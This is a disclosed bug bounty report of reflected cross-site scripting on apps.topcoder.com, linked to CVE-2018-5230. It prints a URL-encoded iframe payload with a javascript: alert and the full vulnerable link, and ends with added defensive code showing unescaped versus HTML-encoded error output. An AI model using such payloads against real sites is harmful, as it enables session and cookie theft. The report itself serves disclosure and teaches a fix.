Cross Site Scripting via CVE-2018-5230 on https://apps.topcoder.com

Disclosed: 2020-02-24 04:18:47 By n0x496n To lab45
Medium
Vulnerability Details
Hi, I found reflected XSS on https://apps.topcoder.com via error message.

Payload:

```
%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm
```

Vulnerable link: https://apps.topcoder.com/wiki/labels/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm

Steps to reproduce: Create an account and visit the vulnerable URL.

{F693517}

References:

https://www.cvedetails.com/cve/CVE-2018-5230/
https://www.exploit-db.com/exploits/37791

Best regards.

## Impact

Hackers can steal victim's cookies
Report Stats
  • Report ID: 781284
  • State: Closed
  • Substate: resolved
  • Upvotes: 40
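The report describes a request path being reflected in an error message. The following is an added example, not code from the report, Topcoder or the affected product: it contrasts an error page that echoes the decoded path segment as markup with one that HTML-encodes it at output. The handler names, the `/wiki/labels/` parsing and the error text are assumptions made for illustration; only the request path is taken from the report.

```javascript
// Hypothetical error-page handler (illustrative names and error text).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change HTML parsing context.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Percent-decode one path segment. Malformed sequences make
// decodeURIComponent throw; fall back to the raw segment so the
// error page still renders (and is still escaped by the caller).
function decodeSegment(segment) {
  try {
    return decodeURIComponent(segment);
  } catch (e) {
    return segment;
  }
}

// Extract the label part of /wiki/labels/<label>.
function labelFromPath(path) {
  const prefix = '/wiki/labels/';
  return path.startsWith(prefix) ? decodeSegment(path.slice(prefix.length)) : '';
}

// Vulnerable pattern: decoded request data concatenated into markup,
// so an encoded tag in the URL becomes a live element in the response.
function renderErrorUnsafe(path) {
  return '<p>Could not find label: ' + labelFromPath(path) + '</p>';
}

// Hardened pattern: the same value is HTML-encoded at the point of output.
function renderErrorSafe(path) {
  return '<p>Could not find label: ' + escapeHtml(labelFromPath(path)) + '</p>';
}

// Request path from the report's "Vulnerable link".
const REPORTED_PATH =
  "/wiki/labels/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm";

console.log(renderErrorUnsafe(REPORTED_PATH));
console.log(renderErrorSafe(REPORTED_PATH));
```

Encoding at output, rather than filtering the request, also covers the fallback branch where a malformed percent sequence leaves raw `<` characters in the segment.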